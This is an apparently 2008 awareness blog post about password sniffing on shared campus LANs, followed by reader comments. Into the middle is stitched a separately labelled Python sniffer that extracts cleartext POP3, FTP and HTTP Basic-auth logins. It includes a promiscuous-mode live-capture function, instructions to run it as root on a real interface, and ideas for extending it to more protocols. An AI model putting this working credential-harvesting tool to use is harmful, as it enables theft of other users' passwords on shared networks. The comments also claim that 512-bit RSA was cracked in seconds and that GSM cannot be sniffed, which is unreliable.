Imagine!
After a long day of classes on your college campus, you come back to your hostel room to find your college dean and some cops standing at your door, red with fury. Why?
Someone tipped them off that you are storing stolen credit-card data or terrorist material in your email. You are sure you did nothing of the sort and try to prove it by showing them your inbox and your machine.
Alas, you find several files there containing a database of stolen credit cards. Doomed!
You have been using hard-to-guess passwords and changing them regularly. How could someone have got into your account and used it for this? One likely possibility is that you have been the victim of a password sniffer.
Someone probably sniffed your password off the network and, out of spite, planted those files to land you in trouble.

We get victimized by our assumptions. Just because some established brand says that X will secure you does not mean it will; they are just words. This false sense of security, an illusion created by the big Symantecs and McAfees of the world, is the real problem.
You see, the internet is a network. Antivirus software and firewalls can protect you from attacks aimed at your machine; they are not concerned with what your data does once it is on the wire. And that is the juicy spot for the blackhat hacker.
You are online reading this post via the internet, which is, conceptually, a mesh of wires. WiFi is nothing but a wireless version of the same topology, with the same weakness: whether you subscribe to the local cable-internet walah or sit on a LAN inside your office, you can be had.
The whole point is understanding the basics behind TCP/IP. All network data travels as packets, and any packet that crosses a shared medium can be snooped.
Take for example an experiment I did yesterday: I ran a sniffer program on Windows to see what was flowing through my Local Area Network.
One can intercept chat conversations at will. At the time of writing (2008) Google Talk, MSN, Yahoo and Rediff India did not use SSL or any other encryption to protect chats, so your amorous private conversation with your girlfriend, or a serious one with a business affiliate, can be read in the clear by a malicious attacker sitting in his room with a cuppa.
Not surprisingly, passwords could be seen travelling in plaintext too.
To understand how a sniffer works you need one rule: on a shared medium (a hub, or a WiFi network) every computer on the LAN can see the packets sent to and from every other computer, so thousands of machines in my LAN are exposed to one sniffer. A network card normally discards frames not addressed to it; put the NIC into promiscuous mode and it hands every frame up to the sniffer instead. All modern sniffers do that for you. On a switched LAN the switch forwards each frame only to its destination port, so the attacker has to add a trick such as ARP spoofing to pull the traffic through his machine, but the result is the same.
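To make the rule concrete, here is an added example of my own, not code from the original post: a small Python sniffer that parses raw Ethernet/IPv4/TCP frames and pulls cleartext logins out of POP3/FTP (USER/PASS) and HTTP Basic-auth payloads. The sample frames, addresses, user names and passwords are constructed inline so the parsing part runs offline; live_capture() shows the promiscuous-mode setup and assumes Linux, root (CAP_NET_RAW) and an interface name you supply. A TLS frame on port 443 is included to show that the same sniffer gets nothing out of an encrypted session, which is the point the FAQ below makes about https.

```python
"""Minimal LAN password sniffer (added example, not code from the original post).

parse_frame() decodes an Ethernet/IPv4/TCP frame, extract_credentials() pulls
cleartext logins out of POP3/FTP and HTTP Basic-auth payloads, and
live_capture() shows how a sniffer puts the NIC into promiscuous mode on Linux.
All sample frames below are constructed; the addresses and logins are made up.
"""
import base64
import binascii
import re
import socket
import struct

ETH_P_IP = 0x0800      # EtherType for IPv4
ETH_P_ALL = 0x0003     # "every protocol" for AF_PACKET sockets
IPPROTO_TCP = 6

# POP3 and FTP send "USER name" / "PASS secret" as plain text lines
USER_PASS_RE = re.compile(rb"^(USER|PASS)[ \t]+(\S+)", re.M)
# HTTP Basic auth is base64(user:password): encoding, not encryption
BASIC_RE = re.compile(rb"Authorization:[ \t]*Basic[ \t]+([A-Za-z0-9+/=]+)", re.I)


def parse_frame(frame):
    """Return (src_ip, dst_ip, dst_port, tcp_payload) for an IPv4/TCP frame, else None."""
    if len(frame) < 34 or struct.unpack("!H", frame[12:14])[0] != ETH_P_IP:
        return None
    ip = frame[14:]
    ver_ihl, _tos, total_len, _ident, _frag, _ttl, proto, _csum, src, dst = struct.unpack(
        "!BBHHHBBH4s4s", ip[:20])
    ihl = (ver_ihl & 0x0F) * 4
    if (ver_ihl >> 4) != 4 or proto != IPPROTO_TCP or ihl < 20:
        return None
    if total_len > len(ip) or total_len < ihl + 20:   # truncated or malformed
        return None
    tcp = ip[ihl:total_len]
    _sport, dport, _seq, _ack, off_flags = struct.unpack("!HHIIH", tcp[:14])
    data_off = (off_flags >> 12) * 4                  # TCP header length incl. options
    return socket.inet_ntoa(src), socket.inet_ntoa(dst), dport, tcp[data_off:]


def extract_credentials(dport, payload):
    """Return a list of (kind, value) logins visible in a cleartext payload."""
    found = []
    if dport in (21, 110):                            # FTP, POP3
        for cmd, arg in USER_PASS_RE.findall(payload):
            found.append((cmd.decode("ascii"), arg.decode("ascii", "replace")))
    elif dport == 80:                                 # HTTP
        for token in BASIC_RE.findall(payload):
            try:
                creds = base64.b64decode(token, validate=True)
            except binascii.Error:
                continue                              # malformed header, skip it
            found.append(("BASIC", creds.decode("utf-8", "replace")))
    return found                                      # port 443 etc.: nothing readable


def sniff_frames(frames):
    """Run the parser over an iterable of raw frames; return (src, dst, port, kind, value) hits."""
    hits = []
    for frame in frames:
        parsed = parse_frame(frame)
        if parsed is None:
            continue
        src, dst, dport, payload = parsed
        for kind, value in extract_credentials(dport, payload):
            hits.append((src, dst, dport, kind, value))
    return hits


def build_frame(src_ip, dst_ip, dport, payload):
    """Construct a test frame (fixed MACs, zero checksums): enough for parse_frame()."""
    tcp = struct.pack("!HHIIHHHH", 40000, dport, 1, 1, (5 << 12) | 0x18, 65535, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0x4000, 64, IPPROTO_TCP, 0,
                     socket.inet_aton(src_ip), socket.inet_aton(dst_ip)) + tcp
    return bytes.fromhex("001122334455") + bytes.fromhex("66778899aabb") + struct.pack("!H", ETH_P_IP) + ip


# Constructed traffic: a POP3 login, an HTTP Basic-auth request and a TLS record
SAMPLE_FRAMES = [
    build_frame("10.0.0.5", "10.0.0.1", 110, b"USER alice\r\n"),
    build_frame("10.0.0.5", "10.0.0.1", 110, b"PASS hunter2\r\n"),
    build_frame("10.0.0.7", "192.0.2.10", 80,
                b"GET /mail HTTP/1.1\r\nHost: example.com\r\n"
                b"Authorization: Basic Ym9iOnMzY3IzdA==\r\n\r\n"),
    build_frame("10.0.0.9", "192.0.2.20", 443, b"\x16\x03\x01\x00\x05\x01\x00\x00\x01\x00"),
]


def live_capture(iface, max_frames=200):
    """Linux only, needs CAP_NET_RAW: put iface into promiscuous mode and parse real frames.
    Constants are from <linux/if_packet.h>: SOL_PACKET=263, PACKET_ADD_MEMBERSHIP=1,
    PACKET_MR_PROMISC=1; struct packet_mreq is {int ifindex; u16 type; u16 alen; u8 addr[8]}."""
    sock = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(ETH_P_ALL))
    sock.bind((iface, 0))
    mreq = struct.pack("iHH8s", socket.if_nametoindex(iface), 1, 0, b"\0" * 8)
    sock.setsockopt(263, 1, mreq)                     # the promiscuous-mode switch
    return sniff_frames(sock.recv(65535) for _ in range(max_frames))


if __name__ == "__main__":
    for src, dst, dport, kind, value in sniff_frames(SAMPLE_FRAMES):
        print("%s -> %s:%d  %s %s" % (src, dst, dport, kind, value))
```

Run it as a script to print the logins found in the constructed frames; call live_capture("eth0") as root to do the same on a real interface. Only ports 21, 80 and 110 are inspected here; SMTP AUTH, IMAP and HTML form POSTs over plain HTTP are just as readable on the wire and could be added in the same way, while the port-443 frame yields nothing because only the TLS record header is in the clear.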
Dynamite was invented by Alfred Nobel for the good of humankind; it has since evolved into a serious weapon of mass destruction. Likewise, sniffers were invented for white-hat purposes: troubleshooting faulty equipment and monitoring network traffic.
Hackers also use these tools to peer inside a network, but troubleshooting is not the aim. They are after passwords and other gems.
Some data is easily readable and some is not; the difference is in how it is sent. Computers can send information either in plaintext or in encrypted form.
The image above shows just how easy it is to read captured plaintext passwords.
In India, all the IITs and most college campuses distribute internet over a LAN, which, by the same principle, is not a safe environment.
Some questions that might arise after reading this short piece:
- Am I safe doing my business transactions over the internet on a LAN?
Reasonably safe, as of now. The leading internet transaction sites use cryptography built into their web pages: SSL, together with a valid security certificate, is good protection against being sniffed on the LAN. Check that the address bar shows https and that the browser does not warn about the certificate; a sniffer on the LAN then sees only the encrypted stream.
- Does my latest firewall or antivirus protect me against this type of attack?
Heck, no! Firewalls are only good for inbound security: the hacker may not be able to intrude into your machine or plant viruses and Trojans, but firewalls and antivirus are out of the picture once the data leaves your machine and enters the network, where any snooping eye can catch hold of it.
- Any protections?
100 percent security is a myth. For now, make sure you use secure logins (the ones with https in front, so that your data is encrypted on the wire).
Another good measure is to avoid LAN-based internet for sensitive work. An ADSL line from BSNL or Airtel is a point-to-point link, so other subscribers are not on the same segment and cannot sniff it the way a hostel-mate on the LAN can. Note that the ISP and everything upstream still sees whatever you send in plaintext; https remains the real protection.
When a hacker gathers encrypted data it is generally useless to him unless he recovers the key, and for properly used modern ciphers brute-force and dictionary attacks on the key are out of reach: the time involved in the underlying mathematics is far beyond what any cracker has. Dictionary attacks therefore go after weak passwords that protect keys and accounts, not after the cipher itself.
You see, cryptography deployed together with good local antivirus generally creates a solid defence. Nothing can be done, though, if an idiot gets phished by one of those Nigerian million-dollar emails.
After all, as the ancient saying goes, humans are the weakest link in security.
Till next time
Hail open source!
Anirudh Sharma
July 11th, 2008 at 2:05 am
Great article. We need to raise awareness of sniffers, as people have a false sense of security if they use a "complicated" password.
People using WiFi are particularly vulnerable and should not be logging onto banking sites, work email (or personal email), or any other site that requires a username and password.
As a rule, GSM networks are not sniffable, so if you need to work while out of the office, get a 3G GSM network card (or the equivalent from your cellular service provider) and use that. Much safer!
July 11th, 2008 at 2:27 am
Hello techie guy, lack of awareness is a problem! People who go to WiFi networks usually download their emails, thus exposing all their passwords in plain; anyone can sniff them.
Remember once, when Israelis cracked 512-bit RSA in a few seconds; until then it was the de facto standard.
And I agree GSM is much safer. In principle even GSM is crackable; you see, after all its protection is not brute-force proof. But yeah, it's 99.9 percent secure as of now, till someone really dumps the attack. Good suggestion.
Is 3G there in your country? Tell us how it works, and how the speeds compare to other types like EDGE etc.